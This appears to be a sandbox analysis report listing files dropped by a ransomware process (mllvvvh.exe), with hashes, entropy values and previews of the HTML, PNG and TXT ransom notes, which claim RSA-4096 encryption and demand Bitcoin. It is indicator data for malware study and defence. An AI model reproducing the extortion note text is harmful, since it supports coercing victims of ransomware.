                  File Type:Unknown
                  Category:dropped
                  Size (bytes):7856
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:96:Pm1TQDl1ZAUmDrXtiEnqYEx/CWBTFtfb8FOC4AOOyHy+LQs:Ougzr9JkhTfb8ofVS+
                  MD5:436EE3253B8FBB7270B828285B8929C0
                  SHA1:21B592F63A512A94EBCD9E94B5E49573F94C8C3C
                  SHA-256:778408DA78F6082067F768BA7615DF5186409CA3EC57E6222E516AD97F641A61
                  SHA-512:B03A975CF7CF635DA9965DA8D179C6CED31538C9331555C9474514C34E8D7F229ACA3D7DC0DC137900994A4BF625DE5ABB1A42FA08E0F023D1D4BEDD67DD35A0
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\$Recycle.Bin\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):67752
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:1536:xgORxV4ZiQfHaRrVY+ERmwhTgjBe6RkRSb/Ev6OzwD/sO0ptYEIW7Rf5:xgs4ZxIYrTgjoikRSb2nHO0bb1T
                  MD5:14DDFCDD27213B85F966F8842DB39940
                  SHA1:BDDCB3114A568DD0AA8E0A643D6808ED312A74D2
                  SHA-256:613E2A374EC2C7FC5E170B63CF5B6F7189D897D986EDBA1AF76E6345E53C3CC2
                  SHA-512:32A5F3CF76A39C4F0E2CC6461FE3E276FB1ED4AA88CA52EE8CB465DA0D6CE89C2230E0AF2A3AF2F2180A46850B1E86F8EC17834BA32E76930453C83613F979A0
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\$Recycle.Bin\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2097
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:48:seeeeeeeeKsR1I6SqgY7JZ8XVaVes+zdsqfQaGaBJj6BtJ7sOY:E1ItqgY1L3SoUj6Bti
                  MD5:A3A2FFE1C0FE27438871525A2732321A
                  SHA1:1569A82D5F2D2AEF8E2D3038D9B3F3D67B893CD1
                  SHA-256:A77B109B6B32EB45A2BDB8CB24EF7B61D042484DD6BEFB9CAE8845198AADCC23
                  SHA-512:59F5AF99D919C3CA239433413AF61081578D105ECCDDBECF98572D4D66DF270860E45D1090951CC3D2A5C84FF5F108A36617E4E8F3BA18836AD6E5352A601A6C
                  Malicious:true
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Adobe\ARM\Reader_19.012.20034\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):78560
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkGkL
                  MD5:255785AADBA44754EE1B63659569BFBB
                  SHA1:0E95D2D4FA14C16D35B8C2F71FE7336631429F2D
                  SHA-256:A6507608270716E4B1A7F632B8EFD8CDD9FF3B44543355B12EF538D9C9BB6C3C
                  SHA-512:647626038514BAA96B3ECB45954E7D7F51B2522F1FC0F675FD43EB27DAC650ECB25DA819C1C81276ED26E5B3465D4E109D48FC3CC51350D65E9FB34195ECC4A9
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Adobe\ARM\Reader_19.012.20034\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):677520
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrC3
                  MD5:717F3CF5CC00702248402EDE3FDEA469
                  SHA1:D79D0F865A1184F673CF0E1C6763769483790C7A
                  SHA-256:430A9A2743CF22FF7A066C6E32AE4790E4811979DC6EC84497DB18A41EC82918
                  SHA-512:2D36B68B4FEA44A6658523DE8D51A975D0FB5A1D95496A7D10385FCBAF0F6245E65D098B44FEBE7C89B7A4BE1DC11020854D05973FF698FB06F685D1889DA8B7
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Adobe\ARM\Reader_19.012.20034\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):20970
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5/5u
                  MD5:A80DFCF483AF64FE5C9A84D07F0AEEF1
                  SHA1:1899C0D2F95F8E9DFB915A51616594C176BCE2F7
                  SHA-256:A3F8D08D475E94FE572F87DF8EAE541973485E00A5E0245BF15DD1831AEBCC6D
                  SHA-512:1876952B061D1E6A97CE9C0C3EACC0D3CBDCBC1C95345C47FF1CAEB670E80172DC07186BFBD9DCED7E55E025311248A78F3BD1167851CA51185943CA7BF0EF1B
                  Malicious:true
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Adobe\ARM\S\11357\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):86416
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkGkGkL
                  MD5:D1947FC8F79D881F20120CEAEFC511D4
                  SHA1:6B9F0AB836409FE6D8A60ACE0408E5AEB28810BB
                  SHA-256:A055F98EFBFE12F3FCA00A2D2A12797E8115DDCA16BBAE244E9F269C8F1FE2CC
                  SHA-512:1526825F15CDC94A36C4EDDC33EA4A113ED93D6842B8F8C56201C9FEED2B1B97F677DCF2E33ED9947CC398F08332BEEEC00572549E26FDA344415ABF0BA3B2DD
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Adobe\ARM\S\11357\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):745272
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCU
                  MD5:38643A69A593611938C85BAF3337DA1B
                  SHA1:E8D9129D250AA084F4E9306B61445CF8B32BFA6C
                  SHA-256:BFE9D7F5AD7AC28E231D4E8F4FC4B7E06DF77EBB2D37340A2EDBF787383122DD
                  SHA-512:FC9C588F680CF48F740B6A78B0229B3240DCBA58474C6FD15576A28A182A5490DDF54C2B49CBE40DA4645F2A35396CF312A7B7BE7C60E1AD97135837D0F1B624
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Adobe\ARM\S\11357\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):23067
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5/5/5u
                  MD5:6F9EA1B719E526F11C182ACABF81BA36
                  SHA1:98A7C8C498E97259214638D80FBB5B7ACDC760BC
                  SHA-256:387BBB93DF73D3BAE44280C20D7CC23DB145F987185E92C811F2B8BB9A4A4F71
                  SHA-512:95018868B921382E2C6BFA1E5650612A5BA7E69923B6E36CFE373857AF66DB4D872E98E4E5AC1CF9690D84E1B6F458DC5E891DFA11DBD6984A32813E8FC0E21A
                  Malicious:true
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Adobe\ARM\S\1742\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):86416
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkGkGkL
                  MD5:D1947FC8F79D881F20120CEAEFC511D4
                  SHA1:6B9F0AB836409FE6D8A60ACE0408E5AEB28810BB
                  SHA-256:A055F98EFBFE12F3FCA00A2D2A12797E8115DDCA16BBAE244E9F269C8F1FE2CC
                  SHA-512:1526825F15CDC94A36C4EDDC33EA4A113ED93D6842B8F8C56201C9FEED2B1B97F677DCF2E33ED9947CC398F08332BEEEC00572549E26FDA344415ABF0BA3B2DD
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Adobe\ARM\S\1742\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):745272
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCU
                  MD5:38643A69A593611938C85BAF3337DA1B
                  SHA1:E8D9129D250AA084F4E9306B61445CF8B32BFA6C
                  SHA-256:BFE9D7F5AD7AC28E231D4E8F4FC4B7E06DF77EBB2D37340A2EDBF787383122DD
                  SHA-512:FC9C588F680CF48F740B6A78B0229B3240DCBA58474C6FD15576A28A182A5490DDF54C2B49CBE40DA4645F2A35396CF312A7B7BE7C60E1AD97135837D0F1B624
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Adobe\ARM\S\1742\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):23067
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5/5/5u
                  MD5:6F9EA1B719E526F11C182ACABF81BA36
                  SHA1:98A7C8C498E97259214638D80FBB5B7ACDC760BC
                  SHA-256:387BBB93DF73D3BAE44280C20D7CC23DB145F987185E92C811F2B8BB9A4A4F71
                  SHA-512:95018868B921382E2C6BFA1E5650612A5BA7E69923B6E36CFE373857AF66DB4D872E98E4E5AC1CF9690D84E1B6F458DC5E891DFA11DBD6984A32813E8FC0E21A
                  Malicious:true
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Adobe\ARM\S\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):86416
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkGkGkL
                  MD5:D1947FC8F79D881F20120CEAEFC511D4
                  SHA1:6B9F0AB836409FE6D8A60ACE0408E5AEB28810BB
                  SHA-256:A055F98EFBFE12F3FCA00A2D2A12797E8115DDCA16BBAE244E9F269C8F1FE2CC
                  SHA-512:1526825F15CDC94A36C4EDDC33EA4A113ED93D6842B8F8C56201C9FEED2B1B97F677DCF2E33ED9947CC398F08332BEEEC00572549E26FDA344415ABF0BA3B2DD
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Adobe\ARM\S\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):745272
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCU
                  MD5:38643A69A593611938C85BAF3337DA1B
                  SHA1:E8D9129D250AA084F4E9306B61445CF8B32BFA6C
                  SHA-256:BFE9D7F5AD7AC28E231D4E8F4FC4B7E06DF77EBB2D37340A2EDBF787383122DD
                  SHA-512:FC9C588F680CF48F740B6A78B0229B3240DCBA58474C6FD15576A28A182A5490DDF54C2B49CBE40DA4645F2A35396CF312A7B7BE7C60E1AD97135837D0F1B624
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Adobe\ARM\S\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):23067
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5/5/5u
                  MD5:6F9EA1B719E526F11C182ACABF81BA36
                  SHA1:98A7C8C498E97259214638D80FBB5B7ACDC760BC
                  SHA-256:387BBB93DF73D3BAE44280C20D7CC23DB145F987185E92C811F2B8BB9A4A4F71
                  SHA-512:95018868B921382E2C6BFA1E5650612A5BA7E69923B6E36CFE373857AF66DB4D872E98E4E5AC1CF9690D84E1B6F458DC5E891DFA11DBD6984A32813E8FC0E21A
                  Malicious:true
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Adobe\ARM\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):86416
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkGkGkL
                  MD5:D1947FC8F79D881F20120CEAEFC511D4
                  SHA1:6B9F0AB836409FE6D8A60ACE0408E5AEB28810BB
                  SHA-256:A055F98EFBFE12F3FCA00A2D2A12797E8115DDCA16BBAE244E9F269C8F1FE2CC
                  SHA-512:1526825F15CDC94A36C4EDDC33EA4A113ED93D6842B8F8C56201C9FEED2B1B97F677DCF2E33ED9947CC398F08332BEEEC00572549E26FDA344415ABF0BA3B2DD
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Adobe\ARM\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):745272
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCU
                  MD5:38643A69A593611938C85BAF3337DA1B
                  SHA1:E8D9129D250AA084F4E9306B61445CF8B32BFA6C
                  SHA-256:BFE9D7F5AD7AC28E231D4E8F4FC4B7E06DF77EBB2D37340A2EDBF787383122DD
                  SHA-512:FC9C588F680CF48F740B6A78B0229B3240DCBA58474C6FD15576A28A182A5490DDF54C2B49CBE40DA4645F2A35396CF312A7B7BE7C60E1AD97135837D0F1B624
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Adobe\ARM\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):23067
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5/5/5u
                  MD5:6F9EA1B719E526F11C182ACABF81BA36
                  SHA1:98A7C8C498E97259214638D80FBB5B7ACDC760BC
                  SHA-256:387BBB93DF73D3BAE44280C20D7CC23DB145F987185E92C811F2B8BB9A4A4F71
                  SHA-512:95018868B921382E2C6BFA1E5650612A5BA7E69923B6E36CFE373857AF66DB4D872E98E4E5AC1CF9690D84E1B6F458DC5E891DFA11DBD6984A32813E8FC0E21A
                  Malicious:false
